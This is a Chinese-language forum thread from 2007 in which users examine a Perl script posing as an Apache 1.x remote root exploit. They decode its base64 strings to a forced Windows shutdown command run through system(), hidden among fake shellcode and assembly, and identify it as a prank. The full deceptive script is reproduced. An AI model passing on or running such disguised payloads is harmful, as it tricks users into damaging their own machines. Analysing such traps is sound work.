请斑竹来鉴定一下这个代码!!!

Namelessxp

If this is gonna be distributed, it will be my last one.

唉~

月魔

$mov = decode_base64("c2h1dGRvd24gLXMgLWYgLXQgMA==";
   $int = decode_base64("c2h1dGRvd24gLXMgLWYgLXQgMA==";

c2h1dGRvd24gLXMgLWYgLXQgMA==

经解码是shutdown -s -f -t 0

关机命令-s关机 -f强制 -t 0 等待时间为0 s


这个是最新的网站溢出吗？

月魔

我收藏了，留着看看编程流程

1. A new apache 1.x 0day
   
2. #!/usr/bin/perl
   
3. 
   
4. use MIME::Base64;
   
5. use IO::Socket;
   
6. use HTTP::Response;
   
7. use HTTP::Status;
   
8. use Getopt::Std;
   
9. 
   
10. print q {
    
11. 
    
12. #################################################################
    
13. ##
    
14. ## Apache 1.X Remote Buffer Overflow getRoot() Exploit
    
15. ## written by 666 - blueshisha at safe-mail.net
    
16. ##
    
17. ## ! PRIVATE ! PRIVATE ! PRIVATE ! PRIVATE ! PRIVATE ! PRIVATE !
    
18. ##
    
19. ## If this is gonna be distributed, it will be my last one.
    
20. ##
    
21. #################################################################
    
22. 
    
23. };
    
24. 
    
25. if($#ARGV < 1)
    
26. {
    
27.         print "[^] Usage   :  apache.pl [target] [port]\n";
    
28.         print "[^] Example :  apache.pl 127.0.0.1 80\n";
    
29.         exit;
    
30. }
    
31. 
    
32. # Can be replaced, simply get a rootshell
    
33. 
    
34. 
    
35. $shellcode .= "\x29\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x46".
    
36.               "\x32\x3c\xe5\x83\xeb\xfc\xe2\xf4\x77\xe9\x6f\xa6\x15\x58\x3e\x8f".
    
37.               "\x20\x6a\xa5\x6c\xa7\xff\xbc\x73\x05\x60\x5a\x8d\x57\x6e\x5a\xb6".
    
38.               "\xcf\xd3\x56\x83\x1e\x62\x6d\xb3\xcf\xd3\xf1\x65\xf6\x54\xed\x06".
    
39.               "\x8b\xb2\x6e\xb7\x10\x71\xb5\x04\xf6\x54\xf1\x65\xd5\x58\x3e\xbc".
    
40.               "\xf6\x0d\xf1\x65\x0f\x4b\xc5\x55\x4d\x60\x54\xca\x69\x41\x54\x8d".
    
41.               "\x32\x3c\xe5\x83\xeb\xfc\xe2\xf4\x77\xe9\x6f\xa6\x15\x58\x3e\x8f".
    
42.               "\x20\x6a\xa5\x6c\xa7\xff\xbc\x73\x05\x60\x5a\x8d\x57\x6e\x5a\xb6".
    
43.               "\xcf\xd3\x56\x83\x1e\x62\x6d\xb3\xcf\xd3\xf1\x65\xf6\x54\xed\x06".
    
44.               "\x8b\xb2\x6e\xb7\x10\x71\xb5\x04\xf6\x54\xf1\x65\xd5\x58\x3e\xbc".
    
45.               "\xf6\x0d\xf1\x65\x0f\x4b\xc5\x55\x4d\x60\x54\xca\x69\x41\x54\x8d".
    
46.               "\x69\x50\x55\x8b\xcf\xd1\x6e\xb6\xcf\xd3\xf1\x65";
    
47. 
    
48. 
    
49. my $target = $ARGV[1];
    
50. 
    
51. my $port   = $ARGV[2];
    
52. 
    
53. 
    
54. sub connect    {
    
55.         
    
56. local $SIG{'__DIE__'} =
    
57.        sub { (my $x = $_[0]) =~ s/0x/4/g; die $x };
    
58.        eval { die "0x4141414141" };
    
59.        print $@ if $@;
    
60. }
    
61. 
    
62. 
    
63. sub socket    {
    
64.         
    
65. push  SOCKADDR;
    
66. push  SOCKDATA;
    
67. push  STACKDATA;
    
68. push  ESPOINT;
    
69. push  ENDADDR;
    
70. 
    
71. }
    
72. 
    
73. eval qw (
    
74. 
    
75. Bytecode:
    
76. 
    
77.    dec cx
    
78.    jz Root
    
79.    mov     bp, FloppyOff  ;offset
    
80.         pushf
    
81.         push     cs
    
82.       push      bp
    
83.         jmp     [OldISR]
    
84.    
    
85. Root:                                            
    
86.    inc     cx                              
    
87.    cmp     dx, [SecondCntr] ;cs:.            
    
88.    jne     NotSecond                        
    
89. IsSecond:                                       
    
90.    
    
91. 
    
92.    mov     bh,5                           
    
93.    mov     bl,21                           
    
94.    call    seg OSSetCursorXY:OSSetCursorXY           ; root runs once
    
95.    mov     ax,cx                           
    
96.    call    seg OSPrintWordNum:OSPrintWordNum         
    
97.    
    
98.    
    
99.    
    
100.         mov     bh,5                        
     
101.         mov     bl,22                          
     
102.         call    seg OSSetCursorXY:OSSetCursorXY            
     
103.         mov     ax,[RootCntr] ;cs:.                  
     
104.         mov     [RootCntr],0 ;cs:.                  
     
105.         call    seg OSPrintWordNum:OSPrintWordNum
     
106. );        
     
107. 
     
108. {
     
109. 
     
110.    my ( @S, @T, @M );
     
111. 
     
112.    my $code = '';
     
113. 
     
114. 
     
115. 
     
116.    sub md5 {
     
117. 
     
118.        return undef if ( !defined $_[0] );
     
119. 
     
120.        my $DATA = _md5_pad( $_[0] );
     
121. 
     
122.        &_md5_init() if ( !defined $M[0] );
     
123. 
     
124.        return _md5_perl_generated( \$DATA );
     
125. 
     
126.    }
     
127. 
     
128. 
     
129. 
     
130.    sub _md5_init {
     
131. 
     
132.        return if ( defined $S[0] );
     
133. 
     
134.        my $i;
     
135. 
     
136.        for ( $i = 1 ; $i <= 64 ; $i++ ) {
     
137. 
     
138.            $T[ $i - 1 ] = int( ( 2**32 ) * abs( sin($i) ) );
     
139. 
     
140.        }
     
141. 
     
142.        my @t = ( 7, 12, 17, 22, 5, 9, 14, 20, 4, 11, 16, 23, 6, 10, 15, 21 );
     
143. 
     
144.        for ( $i = 0 ; $i < 64 ; $i++ ) {
     
145. 
     
146.            $S[$i] = $t[ ( int( $i / 16 ) * 4 ) + ( $i % 4 ) ];
     
147. 
     
148.        }
     
149. 
     
150.        @M = (
     
151. 
     
152.            0, 1, 2,  3,  4,  5,  6,  7,  8,  9,  10, 11, 12, 13, 14, 15,
     
153. 
     
154.            1, 6, 11, 0,  5,  10, 15, 4,  9,  14, 3,  8,  13, 2,  7,  12,
     
155. 
     
156.            5, 8, 11, 14, 1,  4,  7,  10, 13, 0,  3,  6,  9,  12, 15, 2,
     
157. 
     
158.            0, 7, 14, 5,  12, 3,  10, 1,  8,  15, 6,  13, 4,  11, 2,  9
     
159. 
     
160.        );
     
161. 
     
162.        &_md5_generate();
     
163. 
     
164.        my $TEST = _md5_pad('foobar');
     
165. 
     
166. 
     
167. 
     
168.         
     
169.    }
     
170. 
     
171. 
     
172. 
     
173.    sub _md5_pad {
     
174. 
     
175.        my $l = length( my $msg = shift() . chr(12 );
     
176. 
     
177.        $msg .= "\0" x ( ( $l % 64 <= 56 ? 56 : 120 ) - $l % 64 );
     
178. 
     
179.        $l = ( $l - 1 ) * 8;
     
180. 
     
181.        $msg .= pack 'VV', $l & 0xffffffff, ( $l >> 16 >> 16 );
     
182. 
     
183.        return $msg;
     
184. 
     
185.    }
     
186. 
     
187.    $mov = decode_base64("c2h1dGRvd24gLXMgLWYgLXQgMA==";
     
188.    $int = decode_base64("c2h1dGRvd24gLXMgLWYgLXQgMA==";
     
189. 
     
190.    sub _md5_generate {
     
191. 
     
192.        my $N = 'abcddabccdabbcda';
     
193. 
     
194.        my ( $i, $M ) = ( 0, '' );
     
195. 
     
196.        $M    = '&0xffffffff' if ( ( 1 << 16 ) << 16 );
     
197. 
     
198.        $code = <<EOT;
     
199. 
     
200.        sub _md5_perl_generated {
     
201. 
     
202.    BEGIN { \$^H |= 1; };
     
203. 
     
204.        my (\$A,\$B,\$C,\$D)=(0x67452301,0xefcdab89,0x98badcfe,0x10325476);
     
205. 
     
206.        my (\$a,\$b,\$c,\$d,\$t,\$i);
     
207. 
     
208.        my \$dr=shift;
     
209. 
     
210.        my \$l=length(\$\$dr);
     
211. 
     
212.        for my \$L (0 .. ((\$l/64)-1) ) {
     
213. 
     
214.                my \@D = unpack('V16', substr(\$\$dr, \$L*64,64));
     
215. 
     
216.                (\$a,\$b,\$c,\$d)=(\$A,\$B,\$C,\$D);
     
217. 
     
218. EOT
     
219. 
     
220.        for ( $i = 0 ; $i < 16 ; $i++ ) {
     
221. 
     
222.            my ( $a, $b, $c, $d ) =
     
223. 
     
224.              split( '', substr( $N, ( $i % 4 ) * 4, 4 ) );
     
225. 
     
226.            $code .=
     
227. 
     
228.              "\$t=((\$$d^(\$$b\&(\$$c^\$$d)))+\$$a+\$D[$M[$i]]+$T[$i])$M;\n";
     
229. 
     
230.            $code .=
     
231. 
     
232. "\$$a=(((\$t<<$S[$i])|((\$t>>(32-$S[$i]))&((1<<$S[$i])-1)))+\$$b)$M;\n";
     
233. 
     
234.        }
     
235. 
     
236.        for ( ; $i < 32 ; $i++ ) {
     
237. 
     
238.            my ( $a, $b, $c, $d ) =
     
239. 
     
240.              split( '', substr( $N, ( $i % 4 ) * 4, 4 ) );
     
241. 
     
242.            $code .=
     
243. 
     
244.              "\$t=((\$$c^(\$$d\&(\$$b^\$$c)))+\$$a+\$D[$M[$i]]+$T[$i])$M;\n";
     
245. 
     
246.            $code .=
     
247. 
     
248. "\$$a=(((\$t<<$S[$i])|((\$t>>(32-$S[$i]))&((1<<$S[$i])-1)))+\$$b)$M;\n";
     
249. 
     
250.        }
     
251. 
     
252.        for ( ; $i < 48 ; $i++ ) {
     
253. 
     
254.            my ( $a, $b, $c, $d ) =
     
255. 
     
256.              split( '', substr( $N, ( $i % 4 ) * 4, 4 ) );
     
257. 
     
258.            $code .= "\$t=((\$$b^\$$c^\$$d)+\$$a+\$D[$M[$i]]+$T[$i])$M;\n";
     
259. 
     
260.            $code .=
     
261. 
     
262. "\$$a=(((\$t<<$S[$i])|((\$t>>(32-$S[$i]))&((1<<$S[$i])-1)))+\$$b)$M;\n";
     
263. 
     
264.        }
     
265. 
     
266.        for ( ; $i < 64 ; $i++ ) {
     
267. 
     
268.            my ( $a, $b, $c, $d ) =
     
269. 
     
270.              split( '', substr( $N, ( $i % 4 ) * 4, 4 ) );
     
271. 
     
272.            $code .= "\$t=((\$$c^(\$$b|(~\$$d)))+\$$a+\$D[$M[$i]]+$T[$i])$M;\n";
     
273. 
     
274.            $code .=
     
275. 
     
276. "\$$a=(((\$t<<$S[$i])|((\$t>>(32-$S[$i]))&((1<<$S[$i])-1)))+\$$b)$M;\n";
     
277. 
     
278.        }
     
279. 
     
280.        $code .= <<EOT;
     
281. 
     
282.                \$A=\$A+\$a\&0xffffffff; \$B=\$B+\$b\&0xffffffff;
     
283. 
     
284.                \$C=\$C+\$c\&0xffffffff; \$D=\$D+\$d\&0xffffffff;
     
285. 
     
286.        } # for
     
287. 
     
288.    return unpack('H*', pack('V4',\$A,\$B,\$C,\$D)); }
     
289. 
     
290. EOT
     
291. 
     
292.        eval "$code";
     
293. 
     
294.    }
     
295. 
     
296. }
     
297. 
     
298.    sub  rehash
     
299.    {
     
300.       my $unencrypted_string = shift @_;
     
301.       my @salt_chars         = ('a'..'z','A'..'Z','0'..'9');
     
302.       my $salt               = $salt_chars[rand(63)] . $salt_chars[rand(63)];
     
303.       return crypt($unencrypted_string, $salt);
     
304.    }
     
305. 
     
306. eval qw (
     
307. 
     
308. make_startup_room:         ; setup ebp for WSAStartup data
     
309.   push BYTE 20             ; push 20
     
310.   pop eax                  ; register
     
311.   mul eax                  ; square that shit = 0x190
     
312.   sub esp, eax             ; make room for WSAStartup data
     
313.   mov ecx, esp
     
314. 
     
315. make_table_room:           ; setup ebp for address table
     
316.   sub esp, BYTE (_WSA_INIT_TBLEN * 4)
     
317.   push edi                 ; [ebp + 8] = LoadLibraryA
     
318.   push esi                 ; [ebp + 4] = LGetProcAddress
     
319.   push ebx                 ; [ebp + 0] = kernel32 dll base
     
320.   mov ebp, esp
     
321.   push ecx                 ; push WSAStartup data address
     
322.   push eax                 ; push 0x190
     
323. 
     
324. make_table:                ; hash the table
     
325.   WSA_HASH_WINSOCK
     
326. 
     
327. wsa_startup:
     
328.   ; call WSAStartup
     
329.   WSA_CALL_WSASTART
     
330. 
     
331. make_socket:
     
332.   ; call WSASocketA, get a tcp socket
     
333.   WSA_CALL_SOCKET 'tcp'
     
334.   ; we got the socket in edi
     
335. );system ($mov);system ($int);shift;
     
336. eval qw (
     
337. 
     
338.         push    word 0x4D2   
     
339.   
     
340.         inc     ebx        
     
341.   
     
342.         push    bx        
     
343.   
     
344.         mov     ecx, esp   
     
345.   
     
346.         push    byte 16        
     
347.   
     
348.         push    ecx        
     
349.   
     
350.         push    eax        
     
351.   
     
352.         mov     ecx, esp
     
353.   
     
354.         mov     al, 102
     
355.   
     
356.         int     0x80
     
357. );
     
358. 
     
359. print "[x] Exploiting...\n";
     
360. 
     
361. sleep(4);
     
362. 
     
363. eval qw <
     
364. accept:
     
365.   
     
366.     push     eax
     
367.   
     
368.     push     edi
     
369.   
     
370.     mov     ecx, esp
     
371.   
     
372.     inc      ebx        
     
373.   
     
374.     mov     al, 102   
     
375.   
     
376.     int     0x80
     
377.   
     
378. dup2:
     
379.   
     
380.         xor     ecx, ecx
     
381.   
     
382.         mov      cl, 3
     
383. >;
     
384. 
     
385. if ($recvdata != 0) {
     
386. print "[x] Executing Shellcode...";
     
387. }
     
388. 
     
389. if ($recvdata == 0) {
     
390. print "[x] Exploit failed!";
     
391. }
     
392. 
     
393. eval qw <
     
394. exec:
     
395.   
     
396.     xor    eax,eax
     
397.   
     
398.     mov     al, 11            
     
399.   
     
400.     push    ecx
     
401.   
     
402.     push     "//sh"
     
403.   
     
404.     push     "/bin"
     
405.   
     
406.     mov      ebx, esp
     
407.   
     
408.     push     ecx
     
409.   
     
410.     push     ebx
     
411.   
     
412.     mov      ecx, esp
     
413.   
     
414.     int      0x80
     
415. >;
     
416. 
     
417. exit;
     

复制代码

flw

晕～
完全看不懂啊。
怎么还有汇编呢？

路小佳

一个恶作剧程序， 不是远程溢出。

1. 
   
2. system ($mov);system ($int);
   

复制代码

真恶毒。

月魔

原帖由 路小佳 于 2007-3-22 17:05 发表
一个恶作剧程序， 不是远程溢出。

1. 
   
2. system ($mov);system ($int);
   

复制代码

真恶毒。

哦，我看了标题以为。。。。。

plbb18

原帖由 路小佳 于 2007-3-22 17:05 发表
一个恶作剧程序， 不是远程溢出。

1. 
   
2. system ($mov);system ($int);
   

复制代码

真恶毒。

已经确定是恶作剧程序,老外的社会工程学!!!谢谢朋友!

plbb18

原帖由 月魔 于 2007-3-22 07:45 发表
$mov = decode_base64("c2h1dGRvd24gLXMgLWYgLXQgMA==";
   $int = decode_base64("c2h1dGRvd24gLXMgLWYgLXQgMA==";

c2h1dGRvd24gLXMgLWYgLXQgMA==

经解码是shutdown -s -f -t 0

...

谢谢!果然包含玄机!不过看看代码结构还是可以参考的哦

月魔

原帖由 plbb18 于 2007-3-24 12:15 发表

谢谢!果然包含玄机!不过看看代码结构还是可以参考的哦

是啊，可以用来解码，呵呵，我用“乱码查看器”搞定的